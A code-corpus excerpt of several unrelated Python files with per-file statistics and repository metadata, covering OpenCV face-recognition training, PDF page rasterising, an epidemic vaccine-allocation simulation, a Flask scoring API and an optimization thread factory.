return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
| 41.553846
| 120
| 0.66716
| 364
| 2,701
| 4.832418
| 0.428571
| 0.035816
| 0.02274
| 0.004548
| 0.018192
| 0.018192
| 0
| 0
| 0
| 0
| 0
| 0.014406
| 0.25472
| 2,701
| 64
| 121
| 42.203125
| 0.859414
| 0.336542
| 0
| 0.069767
| 0
| 0
| 0.059155
| 0.026479
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0
| 0.069767
| 0
| 0.255814
| 0.093023
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60985f194b3e048052f9cb34471c7382107a1768
| 2,704
|
py
|
Python
|
evaluation/datasets/build_dataset_images.py
|
hsiehkl/pdffigures2
|
9ff2978a097f3d500dcb840d31587c26d994cb68
|
[
"Apache-2.0"
] | 296
|
2016-06-19T02:41:09.000Z
|
2022-03-10T05:46:08.000Z
|
evaluation/datasets/build_dataset_images.py
|
hsiehkl/pdffigures2
|
9ff2978a097f3d500dcb840d31587c26d994cb68
|
[
"Apache-2.0"
] | 37
|
2016-07-07T00:11:53.000Z
|
2022-03-18T07:27:32.000Z
|
evaluation/datasets/build_dataset_images.py
|
hsiehkl/pdffigures2
|
9ff2978a097f3d500dcb840d31587c26d994cb68
|
[
"Apache-2.0"
] | 81
|
2016-07-06T23:51:21.000Z
|
2022-03-19T13:50:25.000Z
|
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
| 36.053333
| 94
| 0.616864
| 366
| 2,704
| 4.393443
| 0.31694
| 0.037313
| 0.024254
| 0.037313
| 0.105721
| 0.105721
| 0.105721
| 0.105721
| 0.057214
| 0.057214
| 0
| 0.003483
| 0.256657
| 2,704
| 74
| 95
| 36.540541
| 0.796517
| 0
| 0
| 0.101695
| 0
| 0
| 0.177634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.118644
| 0
| 0.135593
| 0.067797
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
609c86e4469f43e38a1d6ec5480ccb39cd4fde7a
| 1,776
|
py
|
Python
|
vision/_file_utils.py
|
BrianOfrim/boja
|
6571fbbfb7f015e96e80e822d9dc96b4636b4119
|
[
"MIT"
] | 7
|
2020-01-27T18:39:02.000Z
|
2022-02-14T13:23:40.000Z
|
vision/_file_utils.py
|
a428tm/boja
|
6571fbbfb7f015e96e80e822d9dc96b4636b4119
|
[
"MIT"
] | 1
|
2021-06-02T00:55:25.000Z
|
2021-06-02T00:55:25.000Z
|
vision/_file_utils.py
|
a428tm/boja
|
6571fbbfb7f015e96e80e822d9dc96b4636b4119
|
[
"MIT"
] | 6
|
2020-01-28T21:28:23.000Z
|
2020-12-28T14:35:06.000Z
|
from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
| 29.6
| 85
| 0.628378
| 261
| 1,776
| 4.034483
| 0.260536
| 0.060779
| 0.025641
| 0.037037
| 0.353276
| 0.271605
| 0.173789
| 0.094967
| 0.094967
| 0.094967
| 0
| 0.004677
| 0.27759
| 1,776
| 59
| 86
| 30.101695
| 0.816056
| 0
| 0
| 0.24
| 0
| 0
| 0.060811
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.06
| 0
| 0.32
| 0.06
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
609cf5344b535f0910e1e3a47704f4e750a0c25d
| 5,355
|
py
|
Python
|
vaccine_allocation/epi_simulations.py
|
COVID-IWG/epimargin-studies
|
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
|
[
"MIT"
] | null | null | null |
vaccine_allocation/epi_simulations.py
|
COVID-IWG/epimargin-studies
|
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
|
[
"MIT"
] | null | null | null |
vaccine_allocation/epi_simulations.py
|
COVID-IWG/epimargin-studies
|
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
|
[
"MIT"
] | null | null | null |
import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| 45
| 150
| 0.597572
| 740
| 5,355
| 4.071622
| 0.283784
| 0.055758
| 0.018586
| 0.022569
| 0.124461
| 0.09625
| 0.037836
| 0.014935
| 0.014935
| 0.014935
| 0
| 0.038135
| 0.275257
| 5,355
| 118
| 151
| 45.381356
| 0.738212
| 0.024837
| 0
| 0.019417
| 0
| 0
| 0.047354
| 0.018788
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038835
| false
| 0
| 0.07767
| 0
| 0.145631
| 0.029126
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
609d2577b79fe5b4822db1b8e2ab1b0bb0027683
| 1,975
|
py
|
Python
|
src/core/agent_state.py
|
nandofioretto/py_dcop
|
fb2dbc97b69360f5d1fb67d84749e44afcdf48c3
|
[
"Apache-2.0"
] | 4
|
2018-08-06T08:55:36.000Z
|
2018-09-28T12:54:21.000Z
|
src/core/agent_state.py
|
nandofioretto/py_dcop
|
fb2dbc97b69360f5d1fb67d84749e44afcdf48c3
|
[
"Apache-2.0"
] | null | null | null |
src/core/agent_state.py
|
nandofioretto/py_dcop
|
fb2dbc97b69360f5d1fb67d84749e44afcdf48c3
|
[
"Apache-2.0"
] | null | null | null |
'''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i]
| 38.72549
| 86
| 0.663797
| 250
| 1,975
| 5.136
| 0.32
| 0.038162
| 0.11215
| 0.10514
| 0.270249
| 0.23053
| 0.193146
| 0.162773
| 0.162773
| 0.123053
| 0
| 0.004804
| 0.262278
| 1,975
| 51
| 87
| 38.72549
| 0.876458
| 0.241013
| 0
| 0.21875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1875
| false
| 0
| 0.0625
| 0
| 0.34375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a02b70b3feadeb7f3f6ef29e2296758c121c15
| 2,782
|
py
|
Python
|
src/routes/scoring.py
|
jtillman20/cfb-data-api
|
69bcae225e4fa0616eb526bd608e20ace17f1816
|
[
"MIT"
] | null | null | null |
src/routes/scoring.py
|
jtillman20/cfb-data-api
|
69bcae225e4fa0616eb526bd608e20ace17f1816
|
[
"MIT"
] | null | null | null |
src/routes/scoring.py
|
jtillman20/cfb-data-api
|
69bcae225e4fa0616eb526bd608e20ace17f1816
|
[
"MIT"
] | null | null | null |
from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
| 30.571429
| 74
| 0.626528
| 335
| 2,782
| 5.023881
| 0.271642
| 0.042781
| 0.071301
| 0.030897
| 0.199643
| 0.130719
| 0.042781
| 0.042781
| 0
| 0
| 0
| 0
| 0.300503
| 2,782
| 90
| 75
| 30.911111
| 0.864851
| 0.193386
| 0
| 0.156863
| 0
| 0
| 0.146273
| 0.011252
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a3e925a35adb27a53e4a197d8b807d37a073ac
| 13,745
|
py
|
Python
|
swagger_server/controllers/threadFactory.py
|
garagonc/optimization-framework
|
1ca57699d6a3f2f98dcaea96430e75c3f847b49f
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/controllers/threadFactory.py
|
garagonc/optimization-framework
|
1ca57699d6a3f2f98dcaea96430e75c3f847b49f
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/controllers/threadFactory.py
|
garagonc/optimization-framework
|
1ca57699d6a3f2f98dcaea96430e75c3f847b49f
|
[
"Apache-2.0"
] | null | null | null |
import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60")
| 56.102041
| 120
| 0.587923
| 1,473
| 13,745
| 5.270876
| 0.133741
| 0.042504
| 0.037223
| 0.028336
| 0.535291
| 0.470762
| 0.411772
| 0.367079
| 0.27035
| 0.216641
| 0
| 0.000968
| 0.323463
| 13,745
| 244
| 121
| 56.331967
| 0.833961
| 0.051437
| 0
| 0.269608
| 0
| 0
| 0.125396
| 0.010134
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.073529
| 0.004902
| 0.142157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
